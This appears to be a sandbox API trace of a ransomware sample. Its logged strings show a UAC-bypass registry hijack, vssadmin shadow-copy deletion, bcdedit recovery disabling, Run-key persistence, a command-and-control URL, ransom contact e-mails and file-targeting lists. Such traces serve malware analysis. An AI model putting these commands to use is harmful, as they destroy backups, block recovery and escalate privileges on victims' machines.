lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x44\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x38\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x34\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 
1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x63\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0099.857] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0099.857] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0099.857] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0099.857] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0099.858] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0099.858] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0099.858] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0099.858] LockResource (hResData=0x50d55c) returned 0x50d55c [0099.858] FreeResource (hResData=0x50d55c) returned 0 [0099.858] FindResourceW 
(hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0099.858] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0099.858] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0099.858] LockResource (hResData=0x50d64c) returned 0x50d64c [0099.858] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0099.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521c20, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0099.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521c20, cbMultiByte=38, lpWideCharStr=0x14fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0099.858] FreeResource (hResData=0x50d64c) returned 0 [0099.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1521c24, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0099.858] GetCurrentThreadId () returned 0xc18 [0099.858] GetCurrentThreadId () returned 0xc18 [0099.858] GetCurrentThreadId () returned 0xc18 [0099.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bcd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0099.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bcd18, cbMultiByte=239, lpWideCharStr=0x14c2e7c, cchWideChar=239 | out: 
lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0099.859] GetCurrentThreadId () returned 0xc18 [0099.859] GetCurrentThreadId () returned 0xc18 [0099.859] GetCurrentThreadId () returned 0xc18 [0099.859] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0099.859] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0099.859] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0099.859] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0099.861] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0099.862] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0099.863] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0099.864] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0099.865] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0099.865] 
SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0099.867] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0099.868] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14bace4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0099.870] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0099.870] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0099.870] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0099.870] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x14baccc, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0099.870] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0099.870] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0099.870] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0099.870] LockResource (hResData=0x50d72c) returned 0x50d72c [0099.870] FreeResource (hResData=0x50d72c) returned 0 [0099.870] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0099.870] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0099.870] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0099.870] LockResource (hResData=0x50d64c) returned 0x50d64c [0099.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521cc8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0099.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521cc8, cbMultiByte=38, 
lpWideCharStr=0x14fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0099.870] FreeResource (hResData=0x50d64c) returned 0 [0099.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1521ccc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14c0e48, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0099.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14c0e48, cbMultiByte=1410, lpWideCharStr=0x14baccc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H 
\"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.871] GetCurrentThreadId () returned 0xc18 [0099.872] GetCurrentThread () returned 0xfffffffe [0099.872] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0099.872] GetLastError () returned 0x3f0 [0099.872] GetCurrentProcess () returned 0xffffffff [0099.872] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0099.872] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x14bee10, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x14bee10, ReturnLength=0x12fc60) returned 1 [0099.872] CloseHandle (hObject=0xb8) returned 1 [0099.872] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: 
pSid=0x12fc5c*=0x7064e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0099.872] EqualSid (pSid1=0x7064e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14bee74*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0099.872] EqualSid (pSid1=0x7064e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14bee90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0099.872] EqualSid (pSid1=0x7064e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14bee9c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0099.872] GetCurrentProcess () returned 0xffffffff [0099.872] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0099.872] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0099.872] GetLastError () returned 0x7a [0099.872] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x707780 [0099.872] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x707780, TokenInformationLength=0x14, 
ReturnLength=0x12fc64 | out: TokenInformation=0x707780, ReturnLength=0x12fc64) returned 1 [0099.872] GetSidSubAuthorityCount (pSid=0x707788*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x707789 [0099.872] GetSidSubAuthority (pSid=0x707788*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x707790 [0099.872] LocalFree (hMem=0x707780) returned 0x0 [0099.872] CloseHandle (hObject=0xb8) returned 1 [0099.872] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0099.872] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0099.873] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0099.874] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0099.875] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0099.876] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0099.876] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0099.876] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0099.877] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0099.877] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0099.877] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0099.877] 
GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0099.877] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.877] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0099.877] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0099.877] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0099.877] LockResource (hResData=0x516824) returned 0x516824 [0099.877] FreeResource (hResData=0x516824) returned 0 [0099.877] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0099.878] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0099.878] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0099.878] LockResource (hResData=0x50d64c) returned 0x50d64c [0099.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521cc8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0099.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1521cc8, cbMultiByte=38, lpWideCharStr=0x14fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0099.878] FreeResource (hResData=0x50d64c) returned 0 [0099.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1521ccc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0099.878] GetCurrentThreadId () returned 0xc18 [0099.878] GetCurrentThreadId () returned 0xc18 [0099.878] GetCurrentThreadId () returned 0xc18 [0099.878] MultiByteToWideChar 
(in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bee18, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0099.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bee18, cbMultiByte=615, lpWideCharStr=0x14c4f7c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW 
